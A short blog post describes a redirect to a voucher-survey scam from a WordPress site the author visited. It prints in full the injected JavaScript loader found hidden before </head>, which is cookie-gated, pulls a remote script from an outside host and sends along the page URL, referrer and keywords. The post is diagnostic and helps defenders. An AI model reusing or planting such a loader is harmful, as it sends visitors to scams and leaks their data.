Wordpress Redirect Spam

Sneaky Spam JavaScript Redirects WordPress Visitors

I visited a site yesterday and without action on my part, got redirected to some spam advert. I tried to recreate what happened by revisiting the site, but it just loaded as expected. Visited the same site again today, got the redirected spam page again.

Google revealed nothing, so hopefully this will put somebody else onto the scent of this WordPress injected JavaScript spam redirection.

The site I got redirected to, judging by the domain, is probably extremely disposable, so it likely changes often. I got redirected to vpizz.rewards.7031.ws/?sov= with a very long URL featuring all sorts variables: &hid, &&nopop, &noalert, &redid, &gsid, &id, &impid, etc.

The popup text says:

Dear browser user,

You are today’s lucky visitor for: December 6, 2016

Please complete this short survey and to say “Thank you” we’ll give you
a chance to win a Mydin RM1000 VoucherĀ®, a Giant RM1000
VoucherĀ®, or a Tesco RM1000 VoucherĀ®!

Button: OK

I’m based in Kota Kinabalu, the website I visited was for a business in Kuala Lumpur, and the company names of the supposed vouchers are actual Malaysian companies.

 

I had a quick look in the source code of the website to see if I could see anything suspicious.

Everything in the header looked fairly standard, but then I encountered an unusual area that had 98 lines of blank space. On the first line after that, and just before the closing </head> tag, was this suspicious code:

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://www.kec.kz/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

The script was drawing an ambiguously named file from a server in Kazakhstan. Alarm bells.

The line of code is complicated, and the full extent beyond my comprehension, but here’s the gist:

  • On your first visit your browser gets a cookie named “__cfgoid” – I think it lasts 30 mins, but looks like it varies;
  • You’re then redirected to the spam website;
  • If you revisit the original site immediately, nothing happens, because cookie;
  • When you come back later (I revisited some 24 hrs later), the process repeats;
  • If, after your first visit, you delete the cookie and revisit the original site, it redirects you to google.com, to avoid suspicion (so logs your IP or something more invasive?);

Because it’s not my site and I don’t have access to the files, I can’t tell where it came from, where it hides, or how it gets the code into the WordPress source.

The site runs Piquant theme, modified in the parent theme directly, so it hasn’t been updated. They run version 1.1.1 (released 25 Apr 2016), and the original theme is currently on version 1.2.1 (released 29 Aug 2016). Changelog mostly states updates to included plugins, Instagram Feed, Revslider and Visual Composer.

The following plugins are apparent on the front page:

  • intelligent-tabulation
  • contact-form-7
  • instagram-feed
  • revslider
  • js_composer

And that’s a good reason why it’s better to create a child theme instead of modifying the original theme, so that you can keep the original theme, and the plugins that came with it, up to date and secure.

Maybe somebody has info on how to remove this particular malware?

No Comments

And what did you think about that?